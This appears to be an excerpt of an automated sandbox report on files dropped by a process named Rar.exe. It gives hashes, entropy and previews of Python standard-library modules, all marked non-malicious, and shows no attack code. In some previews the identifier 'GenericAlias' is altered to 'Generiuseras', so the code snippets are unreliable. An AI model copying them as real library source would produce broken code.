                                                                                                                                                                                                                                  SHA1:2D96F3E00AB19484FF2487C5A8B59DFE56A1C3AC
                                                                                                                                                                                                                                  SHA-256:266CCCEB862EA94E2B74FDDA4835F8EF149D95C0FC3AAFE12122D0927E686DD3
                                                                                                                                                                                                                                  SHA-512:295601F6A33DD0E9C38B5756BFA77C79402E493362FB7F167B98A12208BAC765101E91A66398D658E1673B7624C8D1A27F6E12EC32FEF22DF650B64E7728CA8D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for collections, according to PEP 3119.....Unit tests are in test_collections..."""....from abc import ABCMeta, abstractmethod..import sys....Generiuseras = type(list[int])..EllipsisType = type(...)..def _f(): pass..FunctionType = type(_f)..del _f....__all__ = ["Awaitable", "Coroutine",.. "AsyncIterable", "AsyncIterator", "AsyncGenerator",.. "Hashable", "Iterable", "Iterator", "Generator", "Reversible",.. "Sized", "Container", "Callable", "Collection",.. "Set", "MutableSet",.. "Mapping", "MutableMapping",.. "MappingView", "KeysView", "ItemsView", "ValuesView",.. "Sequence", "MutableSequence",.. "ByteString",.. ]....# This module has been renamed from collections.abc to _collections_abc to..# speed up interpreter startup. Some of the types such as MutableMapping ar
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9000
                                                                                                                                                                                                                                  Entropy (8bit):5.07161975591546
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jX+gYVVcndom2qXur3co6d/f1OlQcrG5EbhqRbRB:T+gYVVcnrkco6d/f1OlQcC5ES1B
                                                                                                                                                                                                                                  MD5:39786C0D6501D2955C13CFD37EA658CA
                                                                                                                                                                                                                                  SHA1:D099113552AA952CBA09ED87CE277EE15D297749
                                                                                                                                                                                                                                  SHA-256:722B53F3D1843ED446B55B92D039A58B139503192B4D818B2D8B8231EB32E7AB
                                                                                                                                                                                                                                  SHA-512:D5D94D9D889D6E8652C111625E148BAEF924AFBA08CBEDD450787743435AB121E56DFC18206C29082ED1D96FCE3AC222FA5822C99A0A992971C37A6450823296
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This module is used to map the old Python 2 names to the new names used in..# Python 3 for the pickle module. This needed to make pickle streams..# generated with Python 2 loadable by Python 3.....# This is a copy of lib2to3.fixes.fix_imports.MAPPING. We cannot import..# lib2to3 and use the mapping defined there, because lib2to3 uses pickle...# Thus, this could cause the module to be imported recursively...IMPORT_MAPPING = {.. '__builtin__' : 'builtins',.. 'copy_reg': 'copyreg',.. 'Queue': 'queue',.. 'SocketServer': 'socketserver',.. 'ConfigParser': 'configparser',.. 'repr': 'reprlib',.. 'tkFileDialog': 'tkinter.filedialog',.. 'tkSimpleDialog': 'tkinter.simpledialog',.. 'tkColorChooser': 'tkinter.colorchooser',.. 'tkCommonDialog': 'tkinter.commondialog',.. 'Dialog': 'tkinter.dialog',.. 'Tkdnd': 'tkinter.dnd',.. 'tkFont': 'tkinter.font',.. 'tkMessageBox': 'tkinter.messagebox',.. 'ScrolledText': 'tkinter.scrolledtext',.. 'Tkconstants':
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5843
                                                                                                                                                                                                                                  Entropy (8bit):4.312570122004757
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:ArOasdGagyvLQOAj+pPbO6bf/Zvlf0rwazuza6:eOasdbtlb/fcrwazuza6
                                                                                                                                                                                                                                  MD5:F75E9299E14E9B11FD7DAE94D061253E
                                                                                                                                                                                                                                  SHA1:6025D13A35D283496DC83444366FE93E22B03B61
                                                                                                                                                                                                                                  SHA-256:A10CF1A317374641BCDB8252499E9CB9D4D6E774AC724EDFDDDD0433EAD771D9
                                                                                                                                                                                                                                  SHA-512:BEE88E9C44A2477E7679F47F414FF8327AD06EF4E81D65405A1D55E9684040838C9F30F3F0A35FF0C5A7E850B858FE83E48734BE7EA171A1F5DBB75FB45A2FB7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Internal classes used by the gzip, lzma and bz2 modules"""....import io..import sys....BUFFER_SIZE = io.DEFAULT_BUFFER_SIZE # Compressed data read chunk size......class BaseStream(io.BufferedIOBase):.. """Mode-checking helper functions.""".... def _check_not_closed(self):.. if self.closed:.. raise ValueError("I/O operation on closed file").... def _check_can_read(self):.. if not self.readable():.. raise io.UnsupportedOperation("File not open for reading").... def _check_can_write(self):.. if not self.writable():.. raise io.UnsupportedOperation("File not open for writing").... def _check_can_seek(self):.. if not self.readable():.. raise io.UnsupportedOperation("Seeking is only supported ".. "on files open for reading").. if not self.seekable():.. raise io.UnsupportedOperation("The underlying file object "..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15049
                                                                                                                                                                                                                                  Entropy (8bit):4.144690404366886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:hJdW3aalUU2IJWEY4tokA+jFW/tFoak6iExy/LemE/9ueOU:hJRalUU2IJWIo+jEFGaw1iN
                                                                                                                                                                                                                                  MD5:2DFE8125174DDC3D0694E41EB8489C58
                                                                                                                                                                                                                                  SHA1:EF097AC9988D1E06BE47D771008B53797682156D
                                                                                                                                                                                                                                  SHA-256:914361CF055D5D2E1B69A2603A5C94B22DEDB987D72CE9F791AFEC0524718F28
                                                                                                                                                                                                                                  SHA-512:E5657D6619EA50AEE6051808F5C153B75438C97231010F898D9884937C7370241C4C41FA695B002D1AEA0489994F4FD96D3ADE037ECF30D761A99019F9E1E043
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Shared support for scanning document type declarations in HTML and XHTML.....This module is used as a foundation for the html.parser module. It has no..documented public API and should not be used directly....."""....import re...._declname_match = re.compile(r'[a-zA-Z][-_.a-zA-Z0-9]*\s*').match.._declstringlit_match = re.compile(r'(\'[^\']*\'|"[^"]*")\s*').match.._commentclose = re.compile(r'--\s*>').._markedsectionclose = re.compile(r']\s*]\s*>')....# An analysis of the MS-Word extensions is available at..# http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf...._msmarkedsectionclose = re.compile(r']\s*>')....del re......class ParserBase:.. """Parser base class which provides some common support methods used.. by the SGML/HTML and XHTML parsers.""".... def __init__(self):.. if self.__class__ is ParserBase:.. raise RuntimeError(.. "_markupbase.ParserBase must be subclassed").... def reset(self):.. self.lineno = 1..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22361
                                                                                                                                                                                                                                  Entropy (8bit):4.723787766897489
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:KEQb8Fu0jFaUTj065gw4DehE58J+pPSUbjaMVqnV6sxlVItVnCfvQY+yLq6NT:KB8Fu0jFaYj0sgve81pP3SAYy2
                                                                                                                                                                                                                                  MD5:FC4CA3F0DD53369CBDE78E6F34D6D1E0
                                                                                                                                                                                                                                  SHA1:EF1914BA73779F330B6EBB6F68752E5302F4C5E4
                                                                                                                                                                                                                                  SHA-256:66881ABF03400804BC29B465BE8A6560A78EFED1F7CED3FAF9FECAA586157B00
                                                                                                                                                                                                                                  SHA-512:6E6D3F2D62200478381E337872F27F65C86650D88F6E69ADBFB25FD90B9F2A94466253D6670727863DD33A9318F11D800E754E2969BE183DF5B2C1E18FBC0834
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Shared OS X support functions."""....import os..import re..import sys....__all__ = [.. 'compiler_fixup',.. 'customize_config_vars',.. 'customize_compiler',.. 'get_platform_osx',..]....# configuration variables that may contain universal build flags,..# like "-arch" or "-isdkroot", that may need customization for..# the user environment.._UNIVERSAL_CONFIG_VARS = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS', 'BASECFLAGS',.. 'BLDSHARED', 'LDSHARED', 'CC', 'CXX',.. 'PY_CFLAGS', 'PY_LDFLAGS', 'PY_CPPFLAGS',.. 'PY_CORE_CFLAGS', 'PY_CORE_LDFLAGS')....# configuration variables that may contain compiler calls.._COMPILER_CONFIG_VARS = ('BLDSHARED', 'LDSHARED', 'CC', 'CXX')....# prefix added to original configuration variable names.._INITPRE = '_OSX_SUPPORT_INITIAL_'......def _find_executable(executable, path=None):.. """Tries to find 'executable' in the directories listed in 'path'..... A string listing dir
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6336
                                                                                                                                                                                                                                  Entropy (8bit):4.398612520141537
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:tChBz2a5ZMoU3JhZqwCtb4kmAp0PT5L7AH4/kt/E/StLp/kL/5:tChtjgJhZZKb4qH/7O
                                                                                                                                                                                                                                  MD5:E9F2D6D09F06D7E0772B74B32759881C
                                                                                                                                                                                                                                  SHA1:6E4A2145565B7B9436CB7DB5CF18FA97E9B3BEE0
                                                                                                                                                                                                                                  SHA-256:8F790C97331A66EA442964314843F7CC8863FB3D9B899183F6D02598D4361A5C
                                                                                                                                                                                                                                  SHA-512:D3D22D17387A04B79AB54C7F71E994A075AB309057A8F98A3972E0F17535C4D905342D282ECF3D1A8A99351BBC8AEC207E7E277B0377255572153A80EFBB07A6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:from _weakrefset import WeakSet......def get_cache_token():.. """Returns the current ABC cache token..... The token is an opaque object (supporting equality testing) identifying the.. current version of the ABC cache for virtual subclasses. The token changes.. with every call to ``register()`` on any ABC... """.. return ABCMeta._abc_invalidation_counter......class ABCMeta(type):.. """Metaclass for defining Abstract Base Classes (ABCs)..... Use this metaclass to create an ABC. An ABC can be subclassed.. directly, and then acts as a mix-in class. You can also register.. unrelated concrete classes (even built-in classes) and unrelated.. ABCs as 'virtual subclasses' -- these and their descendants will.. be considered subclasses of the registering ABC by the built-in.. issubclass() function, but the registering ABC won't show up in.. their MRO (Method Resolution Order) nor will method.. implementations defined by the registering ABC be callable
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):235086
                                                                                                                                                                                                                                  Entropy (8bit):4.562739393111887
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:PPcxAkfLyemfbPcKpNLuUxOapxHPfm+LymnJvD:3BxP9
                                                                                                                                                                                                                                  MD5:21CC2DE5228D758FC246AE2FBDEAC4FD
                                                                                                                                                                                                                                  SHA1:AFCB2A98A4E45128694B949931E9C759124A9CEC
                                                                                                                                                                                                                                  SHA-256:690E82A528EFB2E9C6C4B624BF28D9F7DF9B8007C3E26FC606ABE8E4C670734A
                                                                                                                                                                                                                                  SHA-512:C72CE199737C56D2A2214CF9B3C047713C5115A110E3D7F6E35F03CE4ECAB84B76D1E144B04659BE66C30C280747A3167518FB2A9A947F0E08065587B714613D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97185
                                                                                                                                                                                                                                  Entropy (8bit):4.3648688617698745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:vi9tkVWSOWuoT4fWEai+6zQWB/5bjhpYgmRA+d:vi9tkU7kuWEai+6cWp5bj3TmRT
                                                                                                                                                                                                                                  MD5:0D371E43F9E94B567CF4701233E240CB
                                                                                                                                                                                                                                  SHA1:516298CDB14B87A60CCD14FC1742BF8F1EE26197
                                                                                                                                                                                                                                  SHA-256:8F2DC04AC4E7281967EC2F124C7CE64CAFF24018A88540AFDE3407A26873589E
                                                                                                                                                                                                                                  SHA-512:B6E175F27F17F9B90857DBABE64601A5674FDBA0A8E8494649A5890024E7C83092D92C2E892573572F5E8CEF854F0021E0F877C90C38179305A3B1589C899E16
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3231
                                                                                                                                                                                                                                  Entropy (8bit):4.290837712719538
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                                                                                                                                                                                                                                  MD5:2E95AAF9BD176B03867862B6DC08626A
                                                                                                                                                                                                                                  SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                                                                                                                                                                                                                                  SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                                                                                                                                                                                                                                  SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25856
                                                                                                                                                                                                                                  Entropy (8bit):4.576262974956046
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTZprdw2W6dNtxz/kNVGC/JrbruMREb:C1FxIO7/p6Woph/5uZTvVrz/g3HuMQCi
                                                                                                                                                                                                                                  MD5:B4CB6BF5E35DC2F8A8D10014F66A72C0
                                                                                                                                                                                                                                  SHA1:8461CA8CFE93FBC0FC385A03428E9B248BE750C7
                                                                                                                                                                                                                                  SHA-256:770CD20E1D9381A3850401868BF1CA375C6BF5AEC7F8E031B6210DF98D789E3F
                                                                                                                                                                                                                                  SHA-512:775762E38D0CA8B954D37DF4BD8CAF76ACD97C3399C0774592D01494A2F2141C2C2EBB4DC29E2A40ACE01A81C46E5EC76FAB9744ABCFDFEC826BDDF83E61B5D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7462
                                                                                                                                                                                                                                  Entropy (8bit):4.6221334949688195
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                                                                                                                                                                                                                                  MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                                                                                                                                                                                                                                  SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                                                                                                                                                                                                                                  SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                                                                                                                                                                                                                                  SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6129
                                                                                                                                                                                                                                  Entropy (8bit):4.19143974100249
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsSP4m4FE8445m4IinbyQqVRA6U4e4nC8C7:ELj/7euM4QgoofXsm4m4FH4484I+byFW
                                                                                                                                                                                                                                  MD5:B63A969483B85C6E81E57B8FABE80F2F
                                                                                                                                                                                                                                  SHA1:8945995094A976581C83455D9ED14F2B81CB7212
                                                                                                                                                                                                                                  SHA-256:5B03D51D4CB46AA7EFFAD1B1ACE0847808E5A43F1EAE7CC9682284A8D0701A76
                                                                                                                                                                                                                                  SHA-512:C4352A0E90FBA11873D4CD61C9E9D978682DB1BBDAB0CFA668F1913DDFD4132791738AFC08EEC931CCC296DAD1B13DB24DBAC8339D235704A7A049AF30683C56
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import Generiuseras....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6710
                                                                                                                                                                                                                                  Entropy (8bit):4.481959964393442
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4BWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kU+0TmnTLikZW9CxbOJbYQ
                                                                                                                                                                                                                                  MD5:3A8E484DC1F9324075F1E574D7600334
                                                                                                                                                                                                                                  SHA1:D70E189BA3A4CF9BEA21A1BBC844479088BBD3A0
                                                                                                                                                                                                                                  SHA-256:A63DE23D93B7CC096AE5DF79032DC2E12778B134BB14F7F40AC9A1F77F102577
                                                                                                                                                                                                                                  SHA-512:2C238B25DD1111EE37A3D7BF71022FE8E6C1D7ECE86B6BBDFA33EE0A3F2A730590FE4BA86CC88F4194D60F419F0FEF09776E5ECA1C473D3F6727249876F00441
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33552
                                                                                                                                                                                                                                  Entropy (8bit):4.4638619417349945
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Ob3TMIq3JHejezqFTYQjJFUT2uXUmwlKje3W73igkZIS3WXpRY:4MHpejezqF0gAT2u/NK3W7Dk9cY
                                                                                                                                                                                                                                  MD5:BF5911BEAF58D01F1317D4416B929EED
                                                                                                                                                                                                                                  SHA1:4D6191C34468BCDEDBDFF0CFE1EB7F44A83BAB27
                                                                                                                                                                                                                                  SHA-256:2EFBA033EF47B3E19DBCDCB6762B9B49AB1982EAE3B9D649548D15AFADC78DAF
                                                                                                                                                                                                                                  SHA-512:B88E727115CEFDFD31498370DACD7FF3ADBF3BD511B06367CB6A9513B5419A6B1A2A83822561E11BF6B41BC6A7AFED4ACBFC542F18CAFE18E741E576380E234D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):517
                                                                                                                                                                                                                                  Entropy (8bit):5.2580863991460935
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                                                                                                                  MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                                                                                                                  SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                                                                                                                  SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                                                                                                                  SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):101137
                                                                                                                                                                                                                                  Entropy (8bit):4.306533315342896
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:g3gKb2hiBVRLsxQ4vu6ilEy14udYC91vhjJFGD8:gQKb2hiBVabu6ilEy14udx1vJJFGA
                                                                                                                                                                                                                                  MD5:5CDD2DD02315B6DD0F093C4D785E3D96
                                                                                                                                                                                                                                  SHA1:06057E30C7F3E7804070A90739C3577FFB9B5AD6
